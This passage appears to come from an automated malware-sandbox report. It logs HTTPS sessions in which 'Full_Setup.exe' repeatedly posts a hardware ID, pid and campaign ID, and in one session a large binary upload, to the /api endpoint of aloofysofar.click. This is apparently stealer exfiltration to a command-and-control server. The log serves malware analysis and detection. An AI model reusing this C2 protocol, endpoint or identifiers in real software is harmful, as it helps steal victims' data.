2025-01-05 16:48:16 UTC	8759	OUT	Data Raw: 2d 2d 39 57 58 50 57 30 4d 45 4d 4e 5a 4b 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 39 57 58 50 57 30 4d 45 4d 4e 5a 4b 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 57 58 50 57 30 4d 45 4d 4e 5a 4b 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 39 57 58 50 57 30 4d 45 4d Data Ascii: --9WXPW0MEMNZKXTContent-Disposition: form-data; name="hwid"5FFDD41A43DE1F6709E39FEBDE2EA801--9WXPW0MEMNZKXTContent-Disposition: form-data; name="pid"2--9WXPW0MEMNZKXTContent-Disposition: form-data; name="lid"hRjzG3--ZINA--9WXPW0MEM
2025-01-05 16:48:16 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=56mp8luugf97jvua5o1e6tunjt; expires=Thu, 01 May 2025 10:34:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIrPRlA%2BjQzgdi1D5Q%2B6MzMlKbaHhux%2BsXoNvbYFw3LgUSEN9rJQ%2FrNlICf%2BSnHAbd6TjscN9xZpRLN0xLd8RSvJvgvIqxbz9nY1E44WxWoXfYum9Z634PHJCW49LGYYINziWA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f475efdd6a5e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1813&rtt_var=698&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9695&delivery_rate=1610590&cwnd=187&unsent_bytes=0&cid=1a8bb34273441d69&ts=577&x=0"
2025-01-05 16:48:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 16:48:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49752	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:17 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6NKQELCCNNAYVGL29P User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20436 Host: aloofysofar.click
2025-01-05 16:48:17 UTC	15331	OUT	Data Raw: 2d 2d 36 4e 4b 51 45 4c 43 43 4e 4e 41 59 56 47 4c 32 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 36 4e 4b 51 45 4c 43 43 4e 4e 41 59 56 47 4c 32 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 4e 4b 51 45 4c 43 43 4e 4e 41 59 56 47 4c 32 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d Data Ascii: --6NKQELCCNNAYVGL29PContent-Disposition: form-data; name="hwid"5FFDD41A43DE1F6709E39FEBDE2EA801--6NKQELCCNNAYVGL29PContent-Disposition: form-data; name="pid"3--6NKQELCCNNAYVGL29PContent-Disposition: form-data; name="lid"hRjzG3--ZINA
2025-01-05 16:48:17 UTC	5105	OUT	Data Raw: 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2025-01-05 16:48:18 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5g7hptfoeurtvmtto8afl2olvn; expires=Thu, 01 May 2025 10:34:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4TU4CDQaDbGoHAlO1w8qLqNEKe%2BV85hB12WHr9DYFHZeLDcwUQgSVQWlEIKKUGU2pGxP441GuQzSkdD2CEG2GJANI1%2BLRC7M2gr7nnM6iKe3pfMtrh3hVvCwNED7qWs9cikz7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f47e9c898c21-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1838&rtt_var=700&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21399&delivery_rate=1551540&cwnd=243&unsent_bytes=0&cid=26ff2a5ff84a8286&ts=633&x=0"
2025-01-05 16:48:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 16:48:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49753	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:19 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6VTO90GNZ34MU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5447 Host: aloofysofar.click
2025-01-05 16:48:19 UTC	5447	OUT	Data Raw: 2d 2d 36 56 54 4f 39 30 47 4e 5a 33 34 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 36 56 54 4f 39 30 47 4e 5a 33 34 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 56 54 4f 39 30 47 4e 5a 33 34 4d 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 36 56 54 4f 39 30 47 4e 5a 33 34 4d Data Ascii: --6VTO90GNZ34MUContent-Disposition: form-data; name="hwid"5FFDD41A43DE1F6709E39FEBDE2EA801--6VTO90GNZ34MUContent-Disposition: form-data; name="pid"1--6VTO90GNZ34MUContent-Disposition: form-data; name="lid"hRjzG3--ZINA--6VTO90GNZ34M
2025-01-05 16:48:22 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dli6m0jpgegkt6lbhosfnkf3s5; expires=Thu, 01 May 2025 10:34:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJ%2Fo3RX7ORO2r8KkaNLGg%2BiRL%2B9stEAKRcFhlbVXTN2m7WAPg30ZctVjzYqFAE1PbjwNMWxNZCl4B8haKYTk6WxZFwSyJNOnP7u33goHf2QfgiHIlzAJmE6384a4QobitpELtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f4898d25440d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1860&rtt_var=718&sent=10&recv=13&lost=0&retrans=0&sent_bytes=2844&recv_bytes=6360&delivery_rate=1502057&cwnd=178&unsent_bytes=0&cid=931e3b4211af879d&ts=3416&x=0"
2025-01-05 16:48:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 16:48:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49755	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:23 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HWGS6YACVX1R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 943 Host: aloofysofar.click
2025-01-05 16:48:23 UTC	943	OUT	Data Raw: 2d 2d 48 57 47 53 36 59 41 43 56 58 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 48 57 47 53 36 59 41 43 56 58 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 57 47 53 36 59 41 43 56 58 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 48 57 47 53 36 59 41 43 56 58 31 52 0d 0a 43 Data Ascii: --HWGS6YACVX1RContent-Disposition: form-data; name="hwid"5FFDD41A43DE1F6709E39FEBDE2EA801--HWGS6YACVX1RContent-Disposition: form-data; name="pid"1--HWGS6YACVX1RContent-Disposition: form-data; name="lid"hRjzG3--ZINA--HWGS6YACVX1RC
2025-01-05 16:48:23 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 16:48:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v7vaek88hese08n4nl6gn5gqhr; expires=Thu, 01 May 2025 10:35:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATzAx%2F61Iq9U5to%2BxR1iyqwwodcF7vWkJxZTJSZiIgDIN8uJjBOR9FLcFqriv%2FVsukHtE4ys1x%2FOYsZtwvdk336NSNN23V0jEcJQ5BO4xT94VtO9u8ELHMPiNaaicfO%2BDBIP7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd4f4a28d2b42e4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1738&rtt_var=715&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1854&delivery_rate=1466599&cwnd=228&unsent_bytes=0&cid=b33c37026086aaf1&ts=474&x=0"
2025-01-05 16:48:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 16:48:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	172.67.196.191	443	7048	C:\Users\user\Desktop\Full_Setup.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 16:48:24 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QBDYKSV9X38VZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568916 Host: aloofysofar.click
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: 2d 2d 51 42 44 59 4b 53 56 39 58 33 38 56 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 46 44 44 34 31 41 34 33 44 45 31 46 36 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 51 42 44 59 4b 53 56 39 58 33 38 56 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 42 44 59 4b 53 56 39 58 33 38 56 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 51 42 44 59 4b 53 56 39 58 33 38 56 Data Ascii: --QBDYKSV9X38VZContent-Disposition: form-data; name="hwid"5FFDD41A43DE1F6709E39FEBDE2EA801--QBDYKSV9X38VZContent-Disposition: form-data; name="pid"1--QBDYKSV9X38VZContent-Disposition: form-data; name="lid"hRjzG3--ZINA--QBDYKSV9X38V
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: af b3 8f c7 9f 86 1f 2a ea 79 d9 e5 fb ab af d8 7d a6 23 be 02 03 52 cc 09 80 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c Data Ascii: y}#Rog1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j\9-Wi]ORQk-
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: ee 1e fd ac 78 5c 46 d3 65 d3 f8 a3 36 36 f0 72 61 77 70 12 3e d8 4b b4 dc e1 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 Data Ascii: x\Fe66rawp>K+6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: 41 20 7a f7 7f 3e 78 2f cb fe 5c d9 fe b1 b2 e2 65 4d 26 12 87 08 b7 d0 b7 8f 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb Data Ascii: A z>x/\eM&oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: b8 13 e9 25 1a 9a dc a4 cc 64 c4 34 b2 4a 1e b8 cc 97 5f 7a 20 c1 29 04 f5 8f 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 Data Ascii: %d4J_z )`"yDe\^s+Fh!C##0u^~ESc 7Ba5<Dt[@\|M5"5}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~x6m^\|.To(1
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: 5a 04 4a 8e c5 5d 06 57 47 13 51 ad a4 8b a7 27 b3 34 f0 d0 5c cc b8 75 6e 5d 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 Data Ascii: ZJ]WGQ'4\un]%,un!"__]-CJ BOLy\|vyTvs~8kQgi0(4RwVf"BM=a)c[eg0'mZFwA!9-H`l`?DTjtJ24a)*STY
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: 6f 7a b5 25 6c 49 6a 3d 20 c8 f1 42 14 fc 5c 1c 2d 07 55 6b f4 36 4b 2a 6e 67 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 Data Ascii: oz%lIj= B\-Uk6Kngzb,ha"C@95mueu5@7O~1zM1j;N"3#I\|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?rHPWv\|
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: 30 57 5c 6a bf a0 a7 af a2 a8 72 5f f9 19 d2 06 d9 67 30 1c 23 a3 db 7f 22 8c 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09 9a 94 61 20 e1 7a Data Ascii: 0W\jr_g0#"^l'(K>xA>\3q?gpe-EZ\|1sHJf=;}hswOqo=7Kpgm.;bA>(eZGh?~--0]>q$e-nKR2&yJa z
2025-01-05 16:48:24 UTC	15331	OUT	Data Raw: 2f ac 66 01 fc bc a5 02 4d 55 17 01 b1 cf fa 02 9e 8a 28 75 a9 40 68 ec 79 c7 aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 